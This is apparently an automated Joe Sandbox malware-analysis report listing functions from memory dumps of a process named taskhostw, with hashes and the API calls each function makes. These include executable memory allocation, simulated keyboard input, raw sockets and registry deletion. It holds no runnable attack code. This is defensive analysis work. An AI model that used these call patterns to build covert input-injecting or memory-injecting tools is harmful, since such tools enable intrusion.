Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: a1be479236236e1ff8ab19b085c2202cf384e26d35f7ae14232e769da2e6be12
Instruction ID: 50be97b3d773e60257b0e62952d7a4ce0235dcc1ae67ca8b4f344231a462f066
Opcode Fuzzy Hash: a1be479236236e1ff8ab19b085c2202cf384e26d35f7ae14232e769da2e6be12
Instruction Fuzzy Hash: 38D0E271920723CFD7309F35C919686BAE4AF05352F55CC2AA88AD6690F670C880CA61

Function 00D6E13E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00D6E1D2
CharLowerBuffW.USER32(?,?), ref: 00D6E215

Part of subcall function 00D6D8B9: CharLowerBuffW.USER32(?,?), ref: 00D6D8D9

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00D6E415
_memmove.LIBCMT ref: 00D6E428

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: afbfac5d034ad0d1c38f3c66600ff237657de10397687c1cd1c6da9e8df7d087
Instruction ID: b548d4db09c39afd841ba4117427268ac8703c1aa40f7036e409846019b34395
Opcode Fuzzy Hash: afbfac5d034ad0d1c38f3c66600ff237657de10397687c1cd1c6da9e8df7d087
Instruction Fuzzy Hash: 6DC16975A083019FC704DF28C48096ABBE4FF89714F18896DF9999B351DB70E946CFA2

Function 00D681A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00D681D8
CoUninitialize.OLE32 ref: 00D681E3

Part of subcall function 00D4D87B: CoCreateInstance.OLE32(?,00000000,00000005,?,?), ref: 00D4D8E3

VariantInit.OLEAUT32(?), ref: 00D681EE
VariantClear.OLEAUT32(?), ref: 00D684BF

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 0304f6c19fad8cf0b9a8220e62c14688b605fe0794dfea27c3c4c83043adcaef
Instruction ID: f1b287385e7a83d842b274e0a01d7b4af62b0153ce0f7e606b1f3c49cf57c60f
Opcode Fuzzy Hash: 0304f6c19fad8cf0b9a8220e62c14688b605fe0794dfea27c3c4c83043adcaef
Instruction Fuzzy Hash: 4FA157752047019FCB50DF14C481B2AB7E5FF88760F088548FA9A9B3A2CB70ED44EB66

Function 02AECD25 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 02AECE9C
_wcscat.LIBCMT ref: 02AECEB4
_wcscat.LIBCMT ref: 02AECEC6

Memory Dump Source

Source File: 00000005.00000003.362011694.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true

Associated: 00000005.00000003.362011694.0000000002B33000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.362011694.0000000002B41000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_2a80000_taskhostw.jbxd

Similarity

API ID: _wcscat$__wsplitpath
String ID:
API String ID: 1413645957-0
Opcode ID: 419868b450b4c3fed61ca736a3cba8fb66ed16f8ebe2498ea679e53552010edd
Instruction ID: 102c39af126d54418138afdc23717fd7872206429a15ed8d39f0c3042059cd9c
Opcode Fuzzy Hash: 419868b450b4c3fed61ca736a3cba8fb66ed16f8ebe2498ea679e53552010edd
Instruction Fuzzy Hash: 7B8153725043459FCB24EF24C584A6EB7EAAF88364F14482FE886C7250EF35D946CF92

Function 00D46BD3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00D46BE4
SysAllocString.OLEAUT32(00000000), ref: 00D46C8D
VariantCopy.OLEAUT32 ref: 00D46CBC
VariantClear.OLEAUT32(?), ref: 00D46CE3

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 8155032ca7967f1dc130293b04082c0bb157ba064f8635d808cfc07dd2283ed0
Instruction ID: 284b4ce09186562512492ff305156f0480e518cc0b1cefcff8cdc86049122aa3
Opcode Fuzzy Hash: 8155032ca7967f1dc130293b04082c0bb157ba064f8635d808cfc07dd2283ed0
Instruction Fuzzy Hash: B2519530B047069BDB24AF75D491A79B7E5EF46710F24882FE597CB291EB70D8809732

Function 02AE92D4 Relevance: 6.2, APIs: 4, Instructions: 156COMMON

Download Yara Rule

APIs

Part of subcall function 02A87341: _memmove.LIBCMT ref: 02A87382

__swprintf.LIBCMT ref: 02AE9396
__swprintf.LIBCMT ref: 02AE93AF
_wprintf.LIBCMT ref: 02AE9465
_wprintf.LIBCMT ref: 02AE9483

Memory Dump Source

Source File: 00000005.00000003.362011694.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true

Associated: 00000005.00000003.362011694.0000000002B33000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.362011694.0000000002B41000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_2a80000_taskhostw.jbxd

Similarity

API ID: __swprintf_wprintf$_memmove
String ID:
API String ID: 2249476411-0
Opcode ID: 5fe8276651298b12dd02ed1421de06954d2c5027e08e5021fe268e399811912e
Instruction ID: 5c573f61d7774b4cfc620b1b686c2f120093054aefa3d95d4069bc8eb60432ca
Opcode Fuzzy Hash: 5fe8276651298b12dd02ed1421de06954d2c5027e08e5021fe268e399811912e
Instruction Fuzzy Hash: B251507284020AAADF15FBA0CE41EEEF77AAF14304F2041A5E516721A0EF316F59CF65

Function 02AE8A04 Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 02A84445: _fseek.LIBCMT ref: 02A8445D

Part of subcall function 02AE8BDD: _wcscmp.LIBCMT ref: 02AE8CCD
Part of subcall function 02AE8BDD: _wcscmp.LIBCMT ref: 02AE8CE0

_free.LIBCMT ref: 02AE8B4B
_free.LIBCMT ref: 02AE8B52
_free.LIBCMT ref: 02AE8BBD
_free.LIBCMT ref: 02AE8BC5

Memory Dump Source

Source File: 00000005.00000003.362011694.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true

Associated: 00000005.00000003.362011694.0000000002B33000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.362011694.0000000002B41000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_2a80000_taskhostw.jbxd

Similarity

API ID: _free$_wcscmp$_fseek
String ID:
API String ID: 3404660211-0
Opcode ID: f56fa67e0b06d3e282f5813e55682b8b0f3bb457bdc1eb1ecdf5f6bc5c6e5ef9
Instruction ID: a3b6fd155a3979a13db91b4f78b42cfa12f73b238f8d23d562f5ac8abeb6d343
Opcode Fuzzy Hash: f56fa67e0b06d3e282f5813e55682b8b0f3bb457bdc1eb1ecdf5f6bc5c6e5ef9
Instruction Fuzzy Hash: AA516DB1944259AFDF24DF64CC80BAEBBBAFF48300F00449EE609A7250DB755A95CF58

Function 02AB84B7 Relevance: 6.1, APIs: 4, Instructions: 130COMMON

Download Yara Rule

APIs

Part of subcall function 02AA80A8: __getptd_noexit.LIBCMT ref: 02AA80A8

__getbuf.LIBCMT ref: 02AB8551
__write.LIBCMT ref: 02AB857F
__lseeki64.LIBCMT ref: 02AB85C3
__write.LIBCMT ref: 02AB85F2

Memory Dump Source

Source File: 00000005.00000003.362011694.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true

Associated: 00000005.00000003.362011694.0000000002B33000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.362011694.0000000002B41000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_2a80000_taskhostw.jbxd

Similarity

API ID: __write$__getbuf__getptd_noexit__lseeki64
String ID:
API String ID: 4182129353-0
Opcode ID: ef91125ff8c223d1a72b4a8ef83d5c35f483301ad284fd55d5e7f103683ae109
Instruction ID: d7636f876fa5b90e06a7e8daef48fa57e3039ba8e5d90fd6698524bda3d301ed
Opcode Fuzzy Hash: ef91125ff8c223d1a72b4a8ef83d5c35f483301ad284fd55d5e7f103683ae109
Instruction Fuzzy Hash: 8541B3B15007059FD7269F2DC991AEA77AE9F41324F04861DE4A68B6D2DF38E940CB50

Function 00D66AC0 Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00D66AE7
WSAGetLastError.WSOCK32(00000000), ref: 00D66AF7

Part of subcall function 00CF9997: __itow.LIBCMT ref: 00CF99C2
Part of subcall function 00CF9997: __swprintf.LIBCMT ref: 00CF9A0C

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00D66B5B
WSAGetLastError.WSOCK32(00000000), ref: 00D66B67

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: caa2e232bd43b0501f1f69c593f77b66f6f8bef1924a9fb61e544ff6b7f281aa
Instruction ID: f62b656c74a5a55f30f6fcfe6f9ac7c0b6663cb7760e316026c11cdaccaa6efc
Opcode Fuzzy Hash: caa2e232bd43b0501f1f69c593f77b66f6f8bef1924a9fb61e544ff6b7f281aa
Instruction Fuzzy Hash: 42419474740204AFEB64AF24DC86F3A77E9DF44B10F448458FA59DB2D2DA749D009BA2

Function 02AEE421 Relevance: 6.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 02AEE457
_wcscmp.LIBCMT ref: 02AEE46E
_wcscmp.LIBCMT ref: 02AEE500
_wcscmp.LIBCMT ref: 02AEE517

Memory Dump Source

Source File: 00000005.00000003.362011694.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true

Associated: 00000005.00000003.362011694.0000000002B33000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.362011694.0000000002B41000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_2a80000_taskhostw.jbxd

Similarity

API ID: _wcscmp
String ID:
API String ID: 856254489-0
Opcode ID: 855258f68d994c25f8440a18dc4a842d1637f7687e67efe119223d49f839d205
Instruction ID: 31fb9d29fad8d3e023a58b221736a9b759a5a0b8ef6c58338988bdbf7432dad4
Opcode Fuzzy Hash: 855258f68d994c25f8440a18dc4a842d1637f7687e67efe119223d49f839d205
Instruction Fuzzy Hash: 1131D8325002196ADF20EFB4DD99BEE77AC9F49234F14057AE806D3090EF35D949CB64

Function 00D66530 Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00D7F910), ref: 00D665BD
_strlen.LIBCMT ref: 00D665EF

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: eacadd01f619690e7717765161def6f9a01af911383869c2ea8308f1772f846e
Instruction ID: 964786ddc5b55fd68b43dcc5f8ef0a8a73dc5cf3cc613c97cc6ca0e538bc9eb6
Opcode Fuzzy Hash: eacadd01f619690e7717765161def6f9a01af911383869c2ea8308f1772f846e
Instruction Fuzzy Hash: 5F419331500108ABCB14EBA4ECD5FBEB7A9EF44310F148155FA1A97292EB30ED45D772

Function 02AEE57E Relevance: 6.1, APIs: 4, Instructions: 112COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 02AEE5B4
_wcscmp.LIBCMT ref: 02AEE5CB
_wcscmp.LIBCMT ref: 02AEE648
_wcscmp.LIBCMT ref: 02AEE65F

Memory Dump Source

Source File: 00000005.00000003.362011694.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true

Associated: 00000005.00000003.362011694.0000000002B33000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.362011694.0000000002B41000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_2a80000_taskhostw.jbxd

Similarity

API ID: _wcscmp
String ID:
API String ID: 856254489-0
Opcode ID: 6218bde2304efc4676ce77e9b54fce35e9b0c74d80cbfc74f25396fbf2f328d6
Instruction ID: 6c2c961ec00aec2b1bf84486f0c5f83355ff8292884be4e8d60a147653447ac9
Opcode Fuzzy Hash: 6218bde2304efc4676ce77e9b54fce35e9b0c74d80cbfc74f25396fbf2f328d6
Instruction Fuzzy Hash: 9C3116719002196ADF20EFA0DD98BDE77AC9F44234F2401A5E805E31A1DF31DA5ACB68

Function 00D78883 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001), ref: 00D78910

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: d00143844c61cdf4cd917a16f2e9ee7f7ae4d48398335c713b7bb9a538f99322
Instruction ID: 4c48a36502260f09c54dfea8c62e5c5ab056c905add38c838dc3a0a3ec231cc9
Opcode Fuzzy Hash: d00143844c61cdf4cd917a16f2e9ee7f7ae4d48398335c713b7bb9a538f99322
Instruction Fuzzy Hash: B0318134681208FAEF219A54DC4DBB83B65AB05320F588515FB59D62E1EB31D980AE73

Function 00D7AB69 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00D7AB92
GetWindowRect.USER32(?,?), ref: 00D7AC08
PtInRect.USER32(?,?,00D7C07E), ref: 00D7AC18
MessageBeep.USER32(00000000,?,?,?,?,00D7C07E,?,?,?), ref: 00D7AC89

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 438f0bc25704396900b25cd65bd74c590b98ae72965538586bff622e662609b1
Instruction ID: 5c7fa0414a0a29c5996dbe11fbe03ed0cfa8f6302cfacb501bd8435f7cf6959a
Opcode Fuzzy Hash: 438f0bc25704396900b25cd65bd74c590b98ae72965538586bff622e662609b1
Instruction Fuzzy Hash: 1E413838600215EFCB12DF58D885A6D7BF5FB89310F2881A9E458CB365E731A845CBA2

Function 00D50E07 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00D50E58
SetKeyboardState.USER32(00000080), ref: 00D50E74
PostMessageW.USER32 ref: 00D50EDA
SendInput.USER32(00000001,00000000,0000001C), ref: 00D50F2C

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 457cc2a0d1695f67da93869e6faa943233a6af6cf728c0738098397da6c71cb1
Instruction ID: 5de58162c14d13e754ecfb83b58a1f9b2375476c8df19824b2cc5948f2295fb5
Opcode Fuzzy Hash: 457cc2a0d1695f67da93869e6faa943233a6af6cf728c0738098397da6c71cb1
Instruction Fuzzy Hash: AD312670944208AAFF308B24880ABFE7FA9EB49312F2C461AFDD4521D1D375898997B5

Function 00D50F42 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00D50F97
SetKeyboardState.USER32(00000080), ref: 00D50FB3
PostMessageW.USER32 ref: 00D51012
SendInput.USER32(00000001,?,0000001C), ref: 00D51064

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 8314568bd145a1e27991ed9d9ec0d6e0c847cda053677ca3e0c51afd7f62973e
Instruction ID: bb793c8e6e2eacb60e5a03946e5df14627088cf2e3194636b27021edf8f53ee3
Opcode Fuzzy Hash: 8314568bd145a1e27991ed9d9ec0d6e0c847cda053677ca3e0c51afd7f62973e
Instruction Fuzzy Hash: 72313A34940398DEFF348B29CC09BFABBA5AF45313F08421AEC95921D1D37889C99771

Function 00D26345 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00D2637B
__isleadbyte_l.LIBCMT ref: 00D263A9
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00D263D7
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00D2640D

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 950b6c64627a8aa8f52c49ed9e68add8ba67a45fd4e37546ca432e3ad748643a
Instruction ID: 715c546981e08f7c5a580559527fbadababae9601a741491981d091748b719a4
Opcode Fuzzy Hash: 950b6c64627a8aa8f52c49ed9e68add8ba67a45fd4e37546ca432e3ad748643a
Instruction Fuzzy Hash: 4731D031604366EFDB21DF65E884BBA7BB5FF51328F194029E86487190EB31D891DBB0

Function 00D74F57 Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00D74F6B

Part of subcall function 00D53685: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00D5369F
Part of subcall function 00D53685: GetCurrentThreadId.KERNEL32(00000000,?,00D550AC), ref: 00D536A6
Part of subcall function 00D53685: AttachThreadInput.USER32(00000000,?,00D550AC), ref: 00D536AD

GetCaretPos.USER32(?), ref: 00D74F7C
ClientToScreen.USER32(00000000,?), ref: 00D74FB7
GetForegroundWindow.USER32 ref: 00D74FBD

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 1aad36220a88c01c97565b758d0ba7e09b13b291d71a6e5bb0036a24ae3619dc
Instruction ID: a3d9241cac173e73d9cf6d052c30de77269a963a3422b9ee66981eb57a2e719f
Opcode Fuzzy Hash: 1aad36220a88c01c97565b758d0ba7e09b13b291d71a6e5bb0036a24ae3619dc
Instruction Fuzzy Hash: 5F315E71900208AFCB50EFB5CC85AEFB7F9EF88300F10406AE905E7201EA719E45CBA1

Function 00D7C502 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00CF2612: GetWindowLongW.USER32(?,000000EB), ref: 00CF2623

GetCursorPos.USER32(?), ref: 00D7C53C
TrackPopupMenuEx.USER32 ref: 00D7C551
GetCursorPos.USER32(?), ref: 00D7C59E
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00D2BB2B,?,?,?), ref: 00D7C5D8

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: eea8a2eb79d44bd7fa483867ff6c7adc5ab29cf8e7361823bc0e7ccef99d19b3
Instruction ID: eace07fc5057a0e986f69d91712ed7c0f94c6fb3bc03d3186de666d273a2c8d0
Opcode Fuzzy Hash: eea8a2eb79d44bd7fa483867ff6c7adc5ab29cf8e7361823bc0e7ccef99d19b3
Instruction Fuzzy Hash: 69319635610518EFCB25CF54D858EEA7BF5EB49310F44816AF9098B261E732AD50DFB0

Function 00D4897E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00D48432: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00D48449
Part of subcall function 00D48432: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00D48453
Part of subcall function 00D48432: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D48462
Part of subcall function 00D48432: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00D48469
Part of subcall function 00D48432: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D4847F

